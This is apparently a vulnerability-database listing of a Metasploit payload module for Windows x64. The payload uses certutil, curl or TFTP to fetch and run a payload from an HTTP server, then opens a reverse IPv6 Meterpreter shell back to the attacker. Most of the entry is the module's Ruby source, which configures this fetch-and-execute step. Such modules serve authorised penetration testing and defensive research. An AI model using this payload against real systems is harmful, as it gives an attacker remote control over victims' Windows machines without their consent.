metasploit
Brendan Watters, OJ Reeves, sf <[email protected]>
MSF:PAYLOAD-CMD-WINDOWS-HTTP-X64-METERPRETER_REVERSE_IPV6_TCP-
History
May 18, 2023 - 3:47 p.m.

HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)

2023-05-18 15:47:29
www.rapid7.com
metasploit
http
windows
x64
payload
fetch
execute
http server

AI Score

7.5

Confidence

Low

Fetch and execute an x64 payload from an HTTP server. Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::HTTP
  include Msf::Payload::Adapter::Fetch::WindowsOptions

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HTTP Fetch',
        'Description' => 'Fetch and execute an x64 payload from an HTTP server.',
        'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
        'Author' => 'Brendan Watters',
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X64,
        'AdaptedPlatform' => 'win'
      )
    )
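    # Replace any previously registered FETCH_COMMAND option with one limited
    # to the fetch tools offered for Windows targets: CURL, TFTP and CERTUTIL
    # (CERTUTIL is the default).
    deregister_options('FETCH_COMMAND')
    register_options(
      [
        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
      ]
    )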
  end
end
